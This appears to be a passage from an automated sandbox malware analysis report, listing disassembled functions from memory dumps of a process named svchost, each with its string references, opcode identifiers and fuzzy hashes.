                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                              • Instruction ID: 5ab04890a3e24fb31e98bcc2c766acfd892471d12dceba8989b9b751fc7dc686
                                                                              • Opcode Fuzzy Hash: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                              • Instruction Fuzzy Hash: 72418E76E00209EFDF15EBD8C995FEEB7BCAB44710F04406BE905BB290D7749A448B90
                                                                              Function 03AC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                              • Instruction ID: 17b1b91cf4f3f09ddc2db6c0ad6f421ffe70fffb75e7dbf7771a928249ab3641
                                                                              • Opcode Fuzzy Hash: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                              • Instruction Fuzzy Hash: E84111359147888BEB26DBA6C964BADBBB8EF99340F18045FD841EF381D7348901CB14
                                                                              Function 03AB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03AB4899
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03AB4888
                                                                              • LdrpCheckRedirection, xrefs: 03AB488F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              • Opcode ID: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                              • Instruction ID: 781f91ffec14b80e1bdf07fd1a3660d804d8cbcf49958b23de19f10f9d4ff7cf
                                                                              • Opcode Fuzzy Hash: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                              • Instruction Fuzzy Hash: B341A232A047509FCB21CFAAD940AA6B7FCBB4E650B09065EEC589B353D731D850CB91
                                                                              Function 03A633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlCreateActivationContext, xrefs: 03AA29F9
                                                                              • SXS: %s() passed the empty activation context data, xrefs: 03AA29FE
                                                                              • Actx , xrefs: 03A633AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                              • API String ID: 0-859632880
                                                                              • Opcode ID: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                              • Instruction ID: 90cc076018201ecea3f90f7c8e04fde8160ee720a7a6b78ea7e0bb2244057c5d
                                                                              • Opcode Fuzzy Hash: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                              • Instruction Fuzzy Hash: 6C3124366007059FDF26DF58C884B9AB7A4FB44711F09886BED059F2E2CB70D852CB90
                                                                              Function 03A61607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03AA1A51
                                                                              • LdrpInitializeTls, xrefs: 03AA1A47
                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 03AA1A40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-931879808
                                                                              • Opcode ID: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                                                              • Instruction ID: 32431d5cc2a7f355dff79ad443be9cb31ff9457863e162745fd04e236378f6ce
                                                                              • Opcode Fuzzy Hash: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                                                              • Instruction Fuzzy Hash: 2731F87AA00200BBDB30DB58CA45F7ABABCFB55758F04066FE505AB680E774AD048790
                                                                              Function 03A71270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • BuildLabEx, xrefs: 03A7130F
                                                                              • @, xrefs: 03A712A5
                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03A7127B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 0-3051831665
                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction ID: a8b8bbb8635f4c2b3293b378a0f0205e4696ba5b75bacd31a1d16628ac6f4bac
                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction Fuzzy Hash: D6316F76A00619AFDB11EF95CD84EAFBBBDEB84750F004427E914AB260D730DA058B90
                                                                              Function 03AB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 03AB20F3
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03AB2104
                                                                              • LdrpInitializationFailure, xrefs: 03AB20FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              • Opcode ID: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                              • Instruction ID: aef50762d6a564b8665e7659e57b1d488da50fa94125045cb761eaa95823ce30
                                                                              • Opcode Fuzzy Hash: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                              • Instruction Fuzzy Hash: C9F02835640308BFD720E70CDD42FD9776CEB40B48F04086BF6006B682D2F0E510CA50
                                                                              Function 03A403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              • Opcode ID: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                              • Instruction ID: 8f770352b08b0b1f9371c788241d3551c7c65bfafa368bf9bbee186269fbe6fe
                                                                              • Opcode Fuzzy Hash: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                              • Instruction Fuzzy Hash: C3715A75A002499FDF01DFA9DA94BAEB7F8AF48304F15416AE901AB351EB34ED01CB60
                                                                              Function 03AD705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: kLsE
                                                                              • API String ID: 3446177414-3058123920
                                                                              • Opcode ID: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                              • Instruction ID: 855d1f489da0e14072bb88a84c01dc8d93171f355f2b0ef998dc5bc328983198
                                                                              • Opcode Fuzzy Hash: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                              • Instruction Fuzzy Hash: 494153325013504AE335FF65EA84BA97BA4AB10B2CF18032EFDA18F6D9CBB54481C791
                                                                              Function 03A452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                              • Instruction ID: ad7057c915d896e68f9593e13577b879d61b08ddc5b21a22d9523fd04d0f494e
                                                                              • Opcode Fuzzy Hash: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                              • Instruction Fuzzy Hash: 113277749083118BDB28CF19C594B3AF7E5AFCA750F18492FF9959B2A0E734D844CB92
                                                                              Function 03A32FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @4Dw@4Dw$PATH
                                                                              • API String ID: 0-2254449710
                                                                              • Opcode ID: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                              • Instruction ID: 2a963f764ed2de4f2c4e31656ad1c2685209a33c935d619a4681d83f28ec82f4
                                                                              • Opcode Fuzzy Hash: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                              • Instruction Fuzzy Hash: 61F1C079D04218DBCF25DF98D981ABEB7B5FF89700F48812AF445AB390D774A841CB61
                                                                              Function 03AFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction ID: 43f70fa5d34d56a64a5fcdc68060a6d8f791d41cfd8d07da9d1eb43c14c6e85b
                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction Fuzzy Hash: F6C1CE312047429FD724CF68C944BABFBE5AF84358F088A2EF699CA290D779D505CF51
                                                                              Function 03A30CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ResIdCount less than 2., xrefs: 03A8EEC9
                                                                              • Failed to retrieve service checksum., xrefs: 03A8EE56
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                              • API String ID: 0-863616075
                                                                              • Opcode ID: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                              • Instruction ID: eae62c7f7d0e92526fcc9591efc1be43e2ac25469e405032f68f141408973b1c
                                                                              • Opcode Fuzzy Hash: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                              • Instruction Fuzzy Hash: 49E1E1B19087849FE324CF15C441BABBBE4BB88314F008A2FE59D8B381DB749509CF56
                                                                              Function 03AAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                              • Instruction ID: fe63cef0f58181a8f0ad6ca9a193e05bfccce0e5103537f7dbb1726626a0688d
                                                                              • Opcode Fuzzy Hash: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                              • Instruction Fuzzy Hash: 83611972E007189FDB25DFA9C980FAEBBB9FB48700F14446EE559EB291D731A940CB50
                                                                              Function 03A4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$
                                                                              • API String ID: 0-233714265
                                                                              • Opcode ID: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                              • Instruction ID: 14f5573c7da737d43996675d3e16fe1be76eff62064721f2db823f9f97dab2d7
                                                                              • Opcode Fuzzy Hash: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                              • Instruction Fuzzy Hash: E0619875A00749DFDB20EFA4C684BA9B7B1BB88308F18516FE515AF780CB74A941CB90
                                                                              Function 004010E0 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff$q
                                                                              • API String ID: 0-918332397
                                                                              • Opcode ID: 97ce171283b42d82976ca56dbdc4c90236aadc8937fca03456c270960f7a6552
                                                                              • Instruction ID: 7afb867e393403ff6ad9d40ee17d8697fa37fa98e2aadaa4b9add5deb6cc4a5f
                                                                              • Opcode Fuzzy Hash: 97ce171283b42d82976ca56dbdc4c90236aadc8937fca03456c270960f7a6552
                                                                              • Instruction Fuzzy Hash: 50410632B0000507DF1C895DDDA07AA7696EBE8355F18C17FEA4AEF3E1E938ED024684
                                                                              Function 03A3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 03A3A2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 03A3A309
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              • Opcode ID: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                              • Instruction ID: 1e984b6ce8cfbe99f09a20eeb728b9390f0b5f5433304e694890da2cf546d44e
                                                                              • Opcode Fuzzy Hash: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                              • Instruction Fuzzy Hash: 02418E39A04659DBDB11CF69C840B69B7F4EF86700F1844ABEC44EB391E335D940CB51
                                                                              Function 03A6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local\$@
                                                                              • API String ID: 0-380025441
                                                                              • Opcode ID: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                              • Instruction ID: 217f52c9be5798c8a8e774fec2ba42c26763eceef0c792221df439a303396b1d
                                                                              • Opcode Fuzzy Hash: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                              • Instruction Fuzzy Hash: 8031A17A5093049FCB10DF28C984A5BBBF8EBC5654F48092FF595872A0DA30DD05CB92
                                                                              Function 03A3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              • Opcode ID: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                              • Instruction ID: 677922b58dce1b654552457bfd1fe1c2554a5188b2ce59053ef5459f6cdb6860
                                                                              • Opcode Fuzzy Hash: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                              • Instruction Fuzzy Hash: E8822775E00218DFDB24CFA9C984BADF7B5BF4A710F18816AE859AB394D7309D81CB50
                                                                              Function 03A82F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: P`2wRb2w
                                                                              • API String ID: 0-2964624058
                                                                              • Opcode ID: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                              • Instruction ID: 614cf0fe81c0d5ac59cda9ef0b1b4f7ab7f7f86c7e6bb9ac2e62ff2701397f9d
                                                                              • Opcode Fuzzy Hash: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                              • Instruction Fuzzy Hash: 6142BE7DD04259AEDF29EFA8D8446BDFBB5AF05B10F18806FE441AB2D0D7748A81CB50
                                                                              Function 03A5FB80 Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2067196109
                                                                              • Opcode ID: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                              • Instruction ID: 7d9423239c206e83e48264a510a76ab65fad31c980a57d05a1c3bd774e68a426
                                                                              • Opcode Fuzzy Hash: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                              • Instruction Fuzzy Hash: 5522C376900609DFDB10DFA8C984BAEB7B5FF88314F1486ABE8149B345E734DA45CB90
                                                                              Function 03A37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                              • Instruction ID: eb0fd9238ef9833a818ff9a74a081080f367bfb7fa71a8f3f298ece9abdc4357
                                                                              • Opcode Fuzzy Hash: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                              • Instruction Fuzzy Hash: F5A169B5608342CFD724DF28D580A2ABBF9BF89304F1449AEF5859B350E731E945CB92
                                                                              Function 03A52E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                              • Instruction ID: fe18fdf758ddbb705bb336e58ff3e2fe2c24488414bd99d2642f4bbddba1e867
                                                                              • Opcode Fuzzy Hash: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                              • Instruction Fuzzy Hash: 2DF18E796087458FDF25CF25C580B6ABBE5AFC8650F09486FFC8A9B380DB30D9498B51
                                                                              Function 0041697E Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: 1512dec80ea374e127638e4f83072ab23baf97c752ec7e07034fea09231f302b
                                                                              • Instruction ID: bf94228a2810af86a10956fae35c952125646ab9a0c384d67a8b2cc036f1d0ea
                                                                              • Opcode Fuzzy Hash: 1512dec80ea374e127638e4f83072ab23baf97c752ec7e07034fea09231f302b
                                                                              • Instruction Fuzzy Hash: B3021F76E006189FDB54CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                              Function 00416983 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                              • Instruction ID: a1e9036dfd06e2825e18ecc76780960be50e1d742efce9da3c4335088054a0ac
                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                              • Instruction Fuzzy Hash: CB021FB6E006189FDB54CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                              Function 03A5FDC0 Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2067196109
                                                                              • Opcode ID: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                              • Instruction ID: 6a4a050eae1b7e7f7f1533120f3ed1f1b40df9eb20d4c6b5a0700e11c6d87b1e
                                                                              • Opcode Fuzzy Hash: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                              • Instruction Fuzzy Hash: 52F1C175900609DFDB14DFA8C980BAEB7B5FF48304F1886AAE815EB345E734DA45CB90
                                                                              Function 03A6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                              • Instruction ID: 1112202be1040bd41c8c32b9f50e9226aa79b4f364d7c1dbbbf504b3a5290133
                                                                              • Opcode Fuzzy Hash: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                              • Instruction Fuzzy Hash: FC414978900288AFDB21DFA9D980AAEFBF4FB48304F14416FE859AB211D7359940CB60
                                                                              Function 03A30100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
